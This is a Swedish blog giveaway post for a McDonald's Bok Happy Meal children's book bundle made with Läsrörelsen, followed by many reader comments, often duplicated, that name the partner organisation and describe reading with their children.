Tävla om bokpaket!

Bok_solfjaer

Nu har ni chansen att vinna ett bokpaket med 8 böcker från Bok Happy Meal.

Dessa böcker ingår i bokpaketet:

o Julia vill ha ett Djur av Barbro Lindgren och Eva Eriksson
o Sov nu Vesta-Linnea av Tove Appelgren och Salla Savolainen
o Pelle hjälper en riddare av Jan Lööf
o Kvällen när pappa lekte av Ulf Stark och Mati Lepp
o När alla sover av Nicolai Houm och Rune Makhus
o Lilla Lena är doktor av Åsa Karsin
o Rita och krokodil på fisketur av Siri Melchior
o Örjan- den höjdrädda örnen av Lars Klinting

Tävlingsregler

Svara på följande i kommentarsfältet.
– Vilken läsfrämjande organisation samarbetar med McDonald’s Bok Happy Meal?
– Motivera varför du vill vinna bokpaketet från Läsrörelsen och McDonald’s.
– Fyll i e-postadress så vi kan kontakta dig vid vinst (visas ej publikt).
– PS. Hjälp med svaret finns här: https://www.alltforforaldrar.se/mcd-bok-happymeal

Vinster
Två vinnare av var sitt bokpaket från Bok Happy Meal.

Mer om tävlingen 
Bok Happy Meal är ett samarbete mellan McDonald’s och Läsrörelsen. Grundläggande tanken är ”Att göra riktigt bra barn- och bilderböcker lätt tillgängliga för så många barn som möjligt och speciellt de som inte går till bokhandeln eller besöker biblioteken.”

Tävlingsperioden är mellan 17:e-30:e oktober

138 Komentarer

 1. Läsrörelsen samarbetar med Mcdonalds. Har två barn som jag vill ska upptäcka böckernas underbara värld. Finns inget bättre än att ta en bok och sätta sig och läsa.

 2. Läsrörelsen samarbetar med Mcdonalds. Har två barn som jag vill ska upptäcka böckernas underbara värld. Finns inget bättre än att ta en bok och sätta sig och läsa.

 3. Läsrörelsen samarbetar med McDonalds sedan 2001, suveränt med mat och bok.
  Detta kunde bli en nystart i sagoläsandet. Vi har kommit av oss med läsandet för yngste sonen och istället lyssnat/läst med våra tre äldre barn. Nu är det Lillemans tur. Skulle vara mysigt att få tiden tillsammans och läsa prata om böcker.

 4. Läsrörelsen!
  Hoppas på att dottern kan hitta några nya böcker hon gillar så att vi jan byta ut dom, som både hon och jag kan utantill…

 5. Hej!
  Svar på frågan:
  Det är Läsrörelsen och McDonalds som samarbetar för Bok Happy Meal.
  Jag skulle gärna vilja vinna ett bokpaket till min stora tjej Tildis som fullkomligt älskar att läsa, bläddra, berätta, titta på bilderna och förtrollas av sagorna & berättelserna.
  Kram Karin

 6. Läsrörelsen samarbetar med McDonalds sedan 2001, suveränt med mat och bok.

  Detta kunde bli en nystart i sagoläsandet. Vi har kommit av oss med läsandet för yngste sonen och istället lyssnat/läst med våra tre äldre barn. Nu är det Lillemans tur. Skulle vara mysigt att få tiden tillsammans och läsa prata om böcker.

 7. Läsrörelsen!
  Hoppas på att dottern kan hitta några nya böcker hon gillar så att vi jan byta ut dom, som både hon och jag kan utantill…

 8. Samarbetet är mellan Läsrörelsen och Mc Donalds. Har en dotter på snart 6 år som tycker om böcker ,ska ärligt erkänna att vi är dåliga på att läsa för henne,vilket vi skulle behöva för vi har dyslexi i halva familjen.Läsa hjälper till att få en förståelse och ett ordförråd.Nya böcker är alltid spännande och extra kul att läsa.Hoppas vinna och sitta och läsa nu i höstrusket.

 9. Hej!
  Svar på frågan:
  Det är Läsrörelsen och McDonalds som samarbetar för Bok Happy Meal.

  Jag skulle gärna vilja vinna ett bokpaket till min stora tjej Tildis som fullkomligt älskar att läsa, bläddra, berätta, titta på bilderna och förtrollas av sagorna & berättelserna.

  Kram Karin

 10. Samarbetet är mellan Läsrörelsen och Mc Donalds. Har en dotter på snart 6 år som tycker om böcker ,ska ärligt erkänna att vi är dåliga på att läsa för henne,vilket vi skulle behöva för vi har dyslexi i halva familjen.Läsa hjälper till att få en förståelse och ett ordförråd.Nya böcker är alltid spännande och extra kul att läsa.Hoppas vinna och sitta och läsa nu i höstrusket.

 11. Hej.
  Dessa trevliga böcker vill jag gärna vinna. Hoppas på tur.
  Jag är 66 år och jag har läst böcker i hela mitt liv. Nu som pensionär läser jag ännu mer. Jag har alltid en bok på gång. Jag har 6 st barnbarn i åldrarna 2 år upp till 12 år.
  Det bästa de och jag vet är när jag läser böcker för dem och dessa böcker verkar väldigt trevliga. Det finns inget bättre än att introducera sagor och äventyr i barnens liv. Vinner jag inte får jag väl gå till McDonalds och köpa Happy Meal så jag får ihop samlingen i alla fall.
  Svar på frågan så är det Läsrörelsen som samarbetar med McDonalds.

 12. Hej.
  Dessa trevliga böcker vill jag gärna vinna. Hoppas på tur.
  Jag är 66 år och jag har läst böcker i hela mitt liv. Nu som pensionär läser jag ännu mer. Jag har alltid en bok på gång. Jag har 6 st barnbarn i åldrarna 2 år upp till 12 år.
  Det bästa de och jag vet är när jag läser böcker för dem och dessa böcker verkar väldigt trevliga. Det finns inget bättre än att introducera sagor och äventyr i barnens liv. Vinner jag inte får jag väl gå till McDonalds och köpa Happy Meal så jag får ihop samlingen i alla fall.
  Svar på frågan så är det Läsrörelsen som samarbetar med McDonalds.

 13. Läsrörelsen har ett samarbete McDonald’s Bok Happy Meal.
  Har en dotter som älskar böcker! Så fort hon ser en bok så vill hon att vi läser den, så det skulle vara kul med några nya böcker i vårt bibliotek.

 14. Rättsvar är Lästörelsen som har samarbete med Mac Donalds.
  Skulle vara roligt att vinna detta bokpaket till mitt barnbarn.Som jag är barnvakt åt en hel del kvällar/nätter när hans föräldrar jobbar då är kvällslektyren räddad kramEwa

 15. Läsrörelsen har ett samarbete McDonald’s Bok Happy Meal.

  Har en dotter som älskar böcker! Så fort hon ser en bok så vill hon att vi läser den, så det skulle vara kul med några nya böcker i vårt bibliotek.

 16. Läsrörelsen samarbetar med Mc Donalds.
  Har tio barnbarn, varav de yngsta är 5 och 6 år.
  Känns som ett perfekt paket för oss att få läsa.
  Vi läser alltid mycket när de är här.

 17. Det är läsrörelsen som samarbetar med Mcdonalds.
  Jag skulle vilja vinna detta till min systerdotter som fyller två år några veckor efter jul. Som student är det svårt att få ekonomin att räcka till både till jul och födelsedagar, så därför vore det så underbart roligt att få skämma bort henne med just ett bokpaket. Hon som älskar böcker, och att få vinna dessa och kunna sitta och läsa och prata om dem vore helt fantastiskt. Så nu håller jag tummarna.

 18. Rättsvar är Lästörelsen som har samarbete med Mac Donalds.
  Skulle vara roligt att vinna detta bokpaket till mitt barnbarn.Som jag är barnvakt åt en hel del kvällar/nätter när hans föräldrar jobbar då är kvällslektyren räddad kramEwa

 19. Läsrörelsen samarbetar med Mc Donalds.

  Har tio barnbarn, varav de yngsta är 5 och 6 år.
  Känns som ett perfekt paket för oss att få läsa.
  Vi läser alltid mycket när de är här.

 20. Det är läsrörelsen som samarbetar med Mcdonalds.

  Jag skulle vilja vinna detta till min systerdotter som fyller två år några veckor efter jul. Som student är det svårt att få ekonomin att räcka till både till jul och födelsedagar, så därför vore det så underbart roligt att få skämma bort henne med just ett bokpaket. Hon som älskar böcker, och att få vinna dessa och kunna sitta och läsa och prata om dem vore helt fantastiskt. Så nu håller jag tummarna.

 21. Läsrörelsen
  Min 5-årige son har talsvårigheter vilket vi träffar logoped för varannan vecka. Orsak okänd. Kanske har jag inte läst tillräckligt mycket för honom. Fick förlossningsdepression och hans pappa lämnade oss 10 månader efter födseln. Då var jag själv men lilleman och fortfarande deprimerad vilket ledde till utmattningssyndrom. Har inte orkat skaffa böcker och läsa tyvärr. Det senaste året mår jag bättre och vi läser en hel del nu samtidigt som vi jobbar med logopeden också. Skulle verkligen uppskattas med fler roliga lättlästa böcker med massa färgglada bilder eftersom min son behöver stimulans för flera sinnen för att lättare lära sig fler ord och meningar.

 22. Läsrörelsen

  Min 5-årige son har talsvårigheter vilket vi träffar logoped för varannan vecka. Orsak okänd. Kanske har jag inte läst tillräckligt mycket för honom. Fick förlossningsdepression och hans pappa lämnade oss 10 månader efter födseln. Då var jag själv men lilleman och fortfarande deprimerad vilket ledde till utmattningssyndrom. Har inte orkat skaffa böcker och läsa tyvärr. Det senaste året mår jag bättre och vi läser en hel del nu samtidigt som vi jobbar med logopeden också. Skulle verkligen uppskattas med fler roliga lättlästa böcker med massa färgglada bilder eftersom min son behöver stimulans för flera sinnen för att lättare lära sig fler ord och meningar.

 23. Hejsan My,
  Jag har listat ut att det är Läsrörselsen som har samarbete med Mc Donalds. Håller tummarna för tur, hade varit trevligt att ha så många nya böcker på en gång

 24. Läsrörelsen samarbetar med McDonalds
  Jag har en underbar liten dotter på 2 år. Det jag alltid har prioriterat från när hon var 4 månader är att läsa innan läggdags. Otroligt mysig stund där det lätt blir flera böcker på rad, och får jag någongång fler barn så ska jag göra detsamma med dem. Nya böcker hade gjort både mig och min dotter överlyckliga. Tack för en härlig blogg!
  Kramar Ulle

 25. Rätt svar är Läsrörelsen.
  Jag blir faster för första gången om några veckor och moster i januari, har även mycket kompisar som väntar eller precis fått tillökning i familjen. Jag kan knappt bärga mig tills jag får barnvakta och vill då inget hellre än att ha en massa härliga, roliga och framför allt nya böcker att frossa i tillsammans med dom små godbitarna! Att läsa, titta på bilder, och slappna av tillsammans var bland det bästa jag visste när jag var liten och jag vill dela med mig av detta!

 26. Sammarbetar med läsrörelsen.
  Läser för mina söner varje kväll innan sovdags. Vi brukar låna på biblioteket. Men ibland blir Liam ledsen när böckerna ska tillbaka. Men vinner vi blir de ju deras. Tycker det är viktigt att läsa för barnen.

 27. Rätt svar är läsrörelsen.
  Jag är förskolelärare och vet hur viktigt det är att läsa för barn. Nu när jag har blivit mamma så tänker jag läsa för min son och dessa böcker vore perfekta starten på samlingen. Min son är bara 2 veckor gammal men man kan aldrig börja för tidigt med att stödja läslusten ?

 28. McDonalds samarbetar med läsrörelen
  Jag skulle vilja vinna bokpaketet eftersom min 3-åriga son älskar att sitta och mysa med en bok, han sitter och tittar på bilderna och hittar på egen text och det är något jag verkligen vill uppmuntra!

 29. Hejsan My,
  Jag har listat ut att det är Läsrörselsen som har samarbete med Mc Donalds. Håller tummarna för tur, hade varit trevligt att ha så många nya böcker på en gång

 30. Läsrörelsen samarbetar med McDonalds

  Jag har en underbar liten dotter på 2 år. Det jag alltid har prioriterat från när hon var 4 månader är att läsa innan läggdags. Otroligt mysig stund där det lätt blir flera böcker på rad, och får jag någongång fler barn så ska jag göra detsamma med dem. Nya böcker hade gjort både mig och min dotter överlyckliga. Tack för en härlig blogg!
  Kramar Ulle

 31. Läsrörelsen samarbetar med Mc Donalds.. Vilket underbart pris! Böcker är bland de bästa min son vet. Vi läser varje dag, bläddrar, fantiserar & det är så mysig stund för både föräldrar och barn. Önskar jag vann detta så vi får nått nytt att bläddra i. Böckerna vi har nu kan man ju nästan utantill

 32. Älskar att läsa och vill förmedla kärleken till böcker till sönerna här hemma så nya böcker är det bästa som finns.
  Läsrörelsen samarbetar med MC Donalds

 33. Läsrörelsen .. Jag måste bli bättre o läsa med min dotter o vad vore inte mer motiverande om man kan vinna lite nya böcker?

 34. Rätt svar är Läsrörelsen.
  Jag blir faster för första gången om några veckor och moster i januari, har även mycket kompisar som väntar eller precis fått tillökning i familjen. Jag kan knappt bärga mig tills jag får barnvakta och vill då inget hellre än att ha en massa härliga, roliga och framför allt nya böcker att frossa i tillsammans med dom små godbitarna! Att läsa, titta på bilder, och slappna av tillsammans var bland det bästa jag visste när jag var liten och jag vill dela med mig av detta!

 35. Hej
  det är läsrörelsen. Vi försöker läsa lite varje dag hemma för jag har en son som inte gillar att läsa men behöver göra det. O då är det bättre att läsa ca tio min varje dag istället för länge o man blir osams. Skulle va kul med lite nya böcker att byta om med.
  kram Cissi

 36. Läsrörelsen.
  Vår lille son är bara fem månader men älskar böcker och bär man läser för honom. Med ett bokpaket skulle vi ha bra böcker redo att ta fram allt eftersom.

 37. Hej! Är gärna med och tävlar ?
  Svar: Läsrörelsen
  MIn lilla kille har nyligen fyllt 3 år och hans fantasi (och tålamod :P) utvecklas så himla mycket just nu, så jag vill gärna uppmuntra detta genom att ge honom nya, bra böcker som passar bättre för hans ålder än vissa av hans gamla ”bebisböcker”.
  Kram Matilda

 38. Svar: läsrörelsen
  Skulle så gärna vilja vinna då min som ofta behöver hjälp med att varva ner och komma till ro. Då brukar vi mysa ihop oss i soffan och läsa en bra bok tillsammans. Men nu har han växt ifrån sina tidigare böcker lite och de börjar bli uttjatade! Vi skulle bli så glada! Dessutom nu när lillasyster också finns med oss.

 39. Läsrörelsen är rätta svaret!
  Träffar oftast mina barn på helgerna, då de sover i veckorna när jag kommer hem från jobbet. Tråkigt men sant. Därför vill jag gärna göra något betydelsefullt med vår tid tillsammans och barnen älskar när jag läser för dom. Därför vore lite nya böcker kanon inför helg myset! Skulle bli såååå glad! / pappa Tommy

 40. Sammarbetar med läsrörelsen.
  Läser för mina söner varje kväll innan sovdags. Vi brukar låna på biblioteket. Men ibland blir Liam ledsen när böckerna ska tillbaka. Men vinner vi blir de ju deras. Tycker det är viktigt att läsa för barnen.

 41. Rätt svar är läsrörelsen.

  Jag är förskolelärare och vet hur viktigt det är att läsa för barn. Nu när jag har blivit mamma så tänker jag läsa för min son och dessa böcker vore perfekta starten på samlingen. Min son är bara 2 veckor gammal men man kan aldrig börja för tidigt med att stödja läslusten 🙂

 42. Läsrörelsen samarbetar med Mcdonalds!
  För oss och våra barn på 1 och 3 år finns det inget bättre än att läsa böcker tillsammans. Det är en lugn och mysig stund för hela familjen och lärorikt för barnen. Är det något jag prioriterar så är det bra och pedagogiska barnböcker även om jag just idag inte har ett fast jobb, så en fin vinst på bra barnböcker skulle vara uppskattat och roligt! ?
  Mvh Helene

 43. McDonalds samarbetar med läsrörelen

  Jag skulle vilja vinna bokpaketet eftersom min 3-åriga son älskar att sitta och mysa med en bok, han sitter och tittar på bilderna och hittar på egen text och det är något jag verkligen vill uppmuntra!

 44. McDonalds samarbetar med Läsrörelsen.
  Jag har en dotter som älskar att läsa hon slukar allt och det bästa hon vet är att läsa för lillebror så denna vinst skulle vara toppen att vinna ?
  //Lena

 45. Läsrörelsen samarbetar med Mc Donalds.. Vilket underbart pris! Böcker är bland de bästa min son vet. Vi läser varje dag, bläddrar, fantiserar & det är så mysig stund för både föräldrar och barn. Önskar jag vann detta så vi får nått nytt att bläddra i. Böckerna vi har nu kan man ju nästan utantill

 46. Älskar att läsa och vill förmedla kärleken till böcker till sönerna här hemma så nya böcker är det bästa som finns.
  Läsrörelsen samarbetar med MC Donalds

 47. Läsrörelsen .. Jag måste bli bättre o läsa med min dotter o vad vore inte mer motiverande om man kan vinna lite nya böcker?

 48. Hej
  det är läsrörelsen. Vi försöker läsa lite varje dag hemma för jag har en son som inte gillar att läsa men behöver göra det. O då är det bättre att läsa ca tio min varje dag istället för länge o man blir osams. Skulle va kul med lite nya böcker att byta om med.
  kram Cissi

 49. Läsrörelsen.

  Vår lille son är bara fem månader men älskar böcker och bär man läser för honom. Med ett bokpaket skulle vi ha bra böcker redo att ta fram allt eftersom.

 50. Hej! Är gärna med och tävlar 🙂

  Svar: Läsrörelsen

  MIn lilla kille har nyligen fyllt 3 år och hans fantasi (och tålamod :P) utvecklas så himla mycket just nu, så jag vill gärna uppmuntra detta genom att ge honom nya, bra böcker som passar bättre för hans ålder än vissa av hans gamla ”bebisböcker”.

  Kram Matilda

 51. Svar: läsrörelsen

  Skulle så gärna vilja vinna då min som ofta behöver hjälp med att varva ner och komma till ro. Då brukar vi mysa ihop oss i soffan och läsa en bra bok tillsammans. Men nu har han växt ifrån sina tidigare böcker lite och de börjar bli uttjatade! Vi skulle bli så glada! Dessutom nu när lillasyster också finns med oss.

 52. Läsrörelsen är rätta svaret!

  Träffar oftast mina barn på helgerna, då de sover i veckorna när jag kommer hem från jobbet. Tråkigt men sant. Därför vill jag gärna göra något betydelsefullt med vår tid tillsammans och barnen älskar när jag läser för dom. Därför vore lite nya böcker kanon inför helg myset! Skulle bli såååå glad! / pappa Tommy

 53. Läsrörelsen samarbetar med Mcdonalds!

  För oss och våra barn på 1 och 3 år finns det inget bättre än att läsa böcker tillsammans. Det är en lugn och mysig stund för hela familjen och lärorikt för barnen. Är det något jag prioriterar så är det bra och pedagogiska barnböcker även om jag just idag inte har ett fast jobb, så en fin vinst på bra barnböcker skulle vara uppskattat och roligt! 🙂

  Mvh Helene

 54. Svaret är läsrörelsen!
  Min dotter som blir 3 år i februari älskar att läsa böcker. Vi har ett par från McDonalds sedan innan och de är faktiskt favoriter så deras böcker tilltalar henne. Lillebror på 1 år verkar även han fascineras av historier och bilder. Så snälla låt oss vinna lite nya böcker till våra mysiga stunder i höst och vinter ?

 55. McDonalds samarbetar med Läsrörelsen.
  Jag har en dotter som älskar att läsa hon slukar allt och det bästa hon vet är att läsa för lillebror så denna vinst skulle vara toppen att vinna 🙂
  //Lena

 56. Svaret är läsrörelsen!
  Min dotter som blir 3 år i februari älskar att läsa böcker. Vi har ett par från McDonalds sedan innan och de är faktiskt favoriter så deras böcker tilltalar henne. Lillebror på 1 år verkar även han fascineras av historier och bilder. Så snälla låt oss vinna lite nya böcker till våra mysiga stunder i höst och vinter 🙂

 57. Läsrörelsen har sammarbete med McDonald’s sen 2001.
  Min dotter som är 3år älskar att lyssna på när jag och min man läser böcker för henne och vi läser 1-2 böcker varje kväll innan hon ska sova. Hon hade blivit superglad för detta bokpaker!

 58. Läsrörelsen har sammarbete med McDonald’s sen 2001.
  Min dotter som är 3år älskar att lyssna på när jag och min man läser böcker för henne och vi läser 1-2 böcker varje kväll innan hon ska sova. Hon hade blivit superglad för detta bokpaker!

 59. Hej!
  Det är Läsrörelsen som samarbetar med McDonalds.
  Har två killar som vi läser mycket för, min äldsta son har börjat första klass nu och det är mycket lästräning. Så lite nya böcker skulle vara väldigt välkommet ?

 60. Hej!

  Det är Läsrörelsen som samarbetar med McDonalds.
  Har två killar som vi läser mycket för, min äldsta son har börjat första klass nu och det är mycket lästräning. Så lite nya böcker skulle vara väldigt välkommet 😉

 61. Ett samarbete med läsrörelsen. Perfekt om man ska äta en Happy Meal på McDonalds.
  Tycker att böcker är viktiga för barn och skapar tidig kunskap som är guld värt. Perfekt för att läsas inför godnattstund.

 62. Läsrörelsen! Jag har alltid älskat att läsa och min önskan är att Neo också blir intresserad av böcker! Det är så mysigt och spännande med böcker och jag vill att det ska bli en del av hans vardag!

 63. Ett samarbete med läsrörelsen. Perfekt om man ska äta en Happy Meal på McDonalds.

  Tycker att böcker är viktiga för barn och skapar tidig kunskap som är guld värt. Perfekt för att läsas inför godnattstund.

 64. Läsrörelsen! Jag har alltid älskat att läsa och min önskan är att Neo också blir intresserad av böcker! Det är så mysigt och spännande med böcker och jag vill att det ska bli en del av hans vardag!

 65. Lästörelsen är den organisation som samarbetar med McDonalds.
  Jag själv läser väldigt mkt böcker och jag är överlycklig att min äldsta dotter på 5 år, visar samma intresse för böcker. Det är en ny bok nästan varje kväll vid läggdags, så ett par nya böcker behövs minsann i hyllan

 66. Läsrörelsen samarbetar med McDonalds!
  Älskar idén med mat och bok men i år får vi tillökning mitt i bokperioden på McDonalds varpå vi kommer missa massa böcker. Hade därför varit perfekt att få hela bokpaketet att mysa med i soffan under all amningstid som kommer framöver. Då kan även storasyster känna att det är mysigt!

 67. Lästörelsen är den organisation som samarbetar med McDonalds.
  Jag själv läser väldigt mkt böcker och jag är överlycklig att min äldsta dotter på 5 år, visar samma intresse för böcker. Det är en ny bok nästan varje kväll vid läggdags, så ett par nya böcker behövs minsann i hyllan

 68. Läsrörelsen samarbetar med McDonalds
  Jag skulle vilja ge böckerna till mina syskonbarn, som har franska som modersmål. Min franska och deras svenska är knackig, men när jag läser för dem öppnas en helt ny gemensam värld!

 69. Läsrörelsen samarbetar med McDonalds!

  Älskar idén med mat och bok men i år får vi tillökning mitt i bokperioden på McDonalds varpå vi kommer missa massa böcker. Hade därför varit perfekt att få hela bokpaketet att mysa med i soffan under all amningstid som kommer framöver. Då kan även storasyster känna att det är mysigt!

 70. Läsrörelsen samarbetar med McDonalds
  Jag skulle vilja ge böckerna till mina syskonbarn, som har franska som modersmål. Min franska och deras svenska är knackig, men när jag läser för dem öppnas en helt ny gemensam värld!

 71. Läsrörelsen är det som samarbetar med McDonalds. Min son på 3 år har precis börjat visa intresse för böcker, och han är lite sen med språket så det är ju kanon att läsa böcker med honom då. Därför skulle jag vilja vinna dessa böcker till honom.

 72. Läsrörelsen är det som samarbetar med McDonalds. Min son på 3 år har precis börjat visa intresse för böcker, och han är lite sen med språket så det är ju kanon att läsa böcker med honom då. Därför skulle jag vilja vinna dessa böcker till honom.

 73. Hej och tack för att man får delta i en sån viktig tävling.
  Svar: Läsrörelsen
  Min son äääälskar böcker, han älskar när vi läser för honom och det är det enda som får honom att varva ner när han annars är väldigt aktiv. Både jag om min man har vuxit upp utan böcker och vi vill därför att det ska vara en stor del av vår sons uppväxt, det är otroligt viktigt för oss att hans intresse för böcker fortsätter och ökar med tiden. Vi har alltid tv:n avstängd och vi vill genom böckerna få bort vanan med tv, spel, Iphone, ipad som idag har blivit för stort i samhället. Vinner vi dessa böcker har vi världens gladaste pojke ? Hans syskon finns nu i magen och om vi vinner kommer vi ha något nytt och roligt att introducera för honom innan han har vant sig vid den nya familjemedlem ?
  Tack!

 74. – Vilken läsfrämjande organisation samarbetar med McDonald’s Bok Happy Meal? Svar: Läsrörelsen.
  – Motivering: Min familj bestående av mig, min sambo och vår underbara son har som tradition att dagligen läsa en stund på kvällen. Det är ett sätt för oss att samla familjen och få en gemensam mysstund som vi alla uppskattar. Vi märker att vår son uppskattar det och att han dels tycker att det är roligt och mysigt, men även att han lär sig saker då vi läser för honom. Att få fortsätta den här gemensamma stunden med bokpaketet från Läsrörelsen och McDonald’s hade betytt oerhört mycket för oss nu och i framtiden.

 75. Svar: Läsrörelsen har ett samarbete med McDonalds
  Jag skulle vilja vinna till min dotter Sanna 3 år. I somras blev hon storasyster och hon har varit så grymt duktig. Hon hjälper mig med allt möjligt. T.ex säger hon mamma gå du på toa jag finns ju här. Och när jag blir ledsen för att lillebror gråter (han har kolik) så kommer hon och tröstar mig, ger mig tips och säger det löser sig mamma, jag finns här.
  Jag är så stolt över min dotter, därför vill jag ge hon dessa fina böcker.

 76. Hej och tack för att man får delta i en sån viktig tävling.

  Svar: Läsrörelsen

  Min son äääälskar böcker, han älskar när vi läser för honom och det är det enda som får honom att varva ner när han annars är väldigt aktiv. Både jag om min man har vuxit upp utan böcker och vi vill därför att det ska vara en stor del av vår sons uppväxt, det är otroligt viktigt för oss att hans intresse för böcker fortsätter och ökar med tiden. Vi har alltid tv:n avstängd och vi vill genom böckerna få bort vanan med tv, spel, Iphone, ipad som idag har blivit för stort i samhället. Vinner vi dessa böcker har vi världens gladaste pojke 😀 Hans syskon finns nu i magen och om vi vinner kommer vi ha något nytt och roligt att introducera för honom innan han har vant sig vid den nya familjemedlem 🙂

  Tack!

 77. Läsrörelsen arbetar för att främja läsintresset.
  Sonen slukar böcker & vi har svårt att ta oss till biblioteket, därför blir det mest begagnade böcker för att ha råd.
  Vi skulle bli himlastormande glada över NYA böcker att läsa i höstmörkret!

 78. – Vilken läsfrämjande organisation samarbetar med McDonald’s Bok Happy Meal? Svar: Läsrörelsen.
  – Motivering: Min familj bestående av mig, min sambo och vår underbara son har som tradition att dagligen läsa en stund på kvällen. Det är ett sätt för oss att samla familjen och få en gemensam mysstund som vi alla uppskattar. Vi märker att vår son uppskattar det och att han dels tycker att det är roligt och mysigt, men även att han lär sig saker då vi läser för honom. Att få fortsätta den här gemensamma stunden med bokpaketet från Läsrörelsen och McDonald’s hade betytt oerhört mycket för oss nu och i framtiden.

 79. Svar: Läsrörelsen har ett samarbete med McDonalds

  Jag skulle vilja vinna till min dotter Sanna 3 år. I somras blev hon storasyster och hon har varit så grymt duktig. Hon hjälper mig med allt möjligt. T.ex säger hon mamma gå du på toa jag finns ju här. Och när jag blir ledsen för att lillebror gråter (han har kolik) så kommer hon och tröstar mig, ger mig tips och säger det löser sig mamma, jag finns här.

  Jag är så stolt över min dotter, därför vill jag ge hon dessa fina böcker.

 80. Läsrörelsen arbetar för att främja läsintresset.
  Sonen slukar böcker & vi har svårt att ta oss till biblioteket, därför blir det mest begagnade böcker för att ha råd.
  Vi skulle bli himlastormande glada över NYA böcker att läsa i höstmörkret!

 81. Läsrörelsen samarbetar med McDonalds
  Efter en lång dag full av måsten och vardagsbestyr,
  läser vi gärna en kvällsaga, full av äventyr!
  Ibland läser vi om prinsessor, lyx och flärd,
  andra gånger flyr vi in i djurens spännande värld!
  Det blir mys och avkoppling i en härlig kombination,
  -ett bokpaket från McDonalds och Mamma My skulle bli sensation!

 82. Rätt svar på frågan är Läsrörelsen.
  Hej, min dotter Alva som är 13 månader älskar böcker. När jag hämtar henne på dagis står hon ofta med en bok i handen, springer fram till mig, viftar med boken och ber mig att läsa. Hon backar bakåt och sätter sig i mitt knä. Vi läser några sidor och sen är det dags för nästa bok som hon hämtar med gott humör. När vi går på biblioteket å stannar hon alltid vid böckerna på nedre hyllan och tar försiktigt ut den ena efter den andra och bläddrar i dem. Hon har inte börjat prata än men jag tror att läsning stimulerar hennes ordförståelse även om vi inte hör det. Därför är den litterära världen viktig för att hennes fantasi, ordförståelse och tal stimuleras.
  Mycket tack! //Emelie

 83. Läsrörelsen
  Jag vill vinna bokpaketet för just att läsa böcker är den finaste stunden jag kan ge min min 4 åriga dotter nu när hon precis blivit storasyster. Vi älskar det båda två och vore otroligt kul att få överraska henne med flera nya ”egna” böcker och inte alltid sönderlästa böcker från bibblan.

 84. Läsrörelsen samarbetar med McDonalds

  Efter en lång dag full av måsten och vardagsbestyr,
  läser vi gärna en kvällsaga, full av äventyr!
  Ibland läser vi om prinsessor, lyx och flärd,
  andra gånger flyr vi in i djurens spännande värld!
  Det blir mys och avkoppling i en härlig kombination,
  -ett bokpaket från McDonalds och Mamma My skulle bli sensation!

 85. Rätt svar på frågan är Läsrörelsen.
  Hej, min dotter Alva som är 13 månader älskar böcker. När jag hämtar henne på dagis står hon ofta med en bok i handen, springer fram till mig, viftar med boken och ber mig att läsa. Hon backar bakåt och sätter sig i mitt knä. Vi läser några sidor och sen är det dags för nästa bok som hon hämtar med gott humör. När vi går på biblioteket å stannar hon alltid vid böckerna på nedre hyllan och tar försiktigt ut den ena efter den andra och bläddrar i dem. Hon har inte börjat prata än men jag tror att läsning stimulerar hennes ordförståelse även om vi inte hör det. Därför är den litterära världen viktig för att hennes fantasi, ordförståelse och tal stimuleras.
  Mycket tack! //Emelie

 86. Läsrörelsen

  Jag vill vinna bokpaketet för just att läsa böcker är den finaste stunden jag kan ge min min 4 åriga dotter nu när hon precis blivit storasyster. Vi älskar det båda två och vore otroligt kul att få överraska henne med flera nya ”egna” böcker och inte alltid sönderlästa böcker från bibblan.

 87. 1) Läsrörelsen samarbetar med McDonalds sedan 2001
  Det finns så många uttryck i leken idag, genom ipads, tv, roliga byggen med lego, klossar och pyssel i färg och form. Men något som verkligen fångar, skapar en gemenskap och ger kunskap till ett välutvecklat språk är den fantastiska boken. Jag känner att vi inte tar tillvara på lässtunden så som vi borde och vi behöver skapa en rutin för att utveckla denna ädla konst vidare. Själv älskade jag böcker då jag var liten och jag minns stunden i mysfåtöljen som en stund av lycka. Något jag skulle föra vidare till mina barn. Bokpaketet skulle bli starten på något nytt, en rutinmässig mysstund av glädje, kunskap och att bara vara tillsammans! Hoppas hoppas!

 88. 1) Läsrörelsen samarbetar med McDonalds sedan 2001

  Det finns så många uttryck i leken idag, genom ipads, tv, roliga byggen med lego, klossar och pyssel i färg och form. Men något som verkligen fångar, skapar en gemenskap och ger kunskap till ett välutvecklat språk är den fantastiska boken. Jag känner att vi inte tar tillvara på lässtunden så som vi borde och vi behöver skapa en rutin för att utveckla denna ädla konst vidare. Själv älskade jag böcker då jag var liten och jag minns stunden i mysfåtöljen som en stund av lycka. Något jag skulle föra vidare till mina barn. Bokpaketet skulle bli starten på något nytt, en rutinmässig mysstund av glädje, kunskap och att bara vara tillsammans! Hoppas hoppas!

 89. Svar: Läsrörelsen
  Min son (3år) älskar att läsa, var tidigare med i goboken men gillade inte riktigt innehållet i deras böcker. Här där vi bor tycker jag faktiskt det är väldigt dåligt med böcker, vi har inte Mcdonalds här heller för den delen så det skulle vara kul att vinna detta bok paket så vi kan variera böckerna och upptäcka nya saker och utveckla språket lite till. ?

 90. Svar: Läsrörelsen

  Min son (3år) älskar att läsa, var tidigare med i goboken men gillade inte riktigt innehållet i deras böcker. Här där vi bor tycker jag faktiskt det är väldigt dåligt med böcker, vi har inte Mcdonalds här heller för den delen så det skulle vara kul att vinna detta bok paket så vi kan variera böckerna och upptäcka nya saker och utveckla språket lite till. 🙂

 91. 1. Läsrörelsen
  2. Avsluta dagen med en saga är en tradition som jag för vidare till min son, när jag växte upp läste alltid pappa en saga för mig innan jag skulle sova, ett bokpaket är guld värt och vi längtar efter de underbara sagorna.

 92. Läsrörelsen <3 ?
  Why ? Fordi mine barn som leser engelsk til vanlig trenger svenske boeker saann at de ikke glemmer svensken sin. Bor i USA og de snakker amerikansk og svensk ( ikke norsk som jeg ? ).
  <3 <3 <3

 93. 1. Läsrörelsen

  2. Avsluta dagen med en saga är en tradition som jag för vidare till min son, när jag växte upp läste alltid pappa en saga för mig innan jag skulle sova, ett bokpaket är guld värt och vi längtar efter de underbara sagorna.

 94. Läsrörelsen <3 🙂

  Why ? Fordi mine barn som leser engelsk til vanlig trenger svenske boeker saann at de ikke glemmer svensken sin. Bor i USA og de snakker amerikansk og svensk ( ikke norsk som jeg 😉 ).
  <3 <3 <3

 95. Det är Läsrörelsen som samarbetar med McDonald’s.
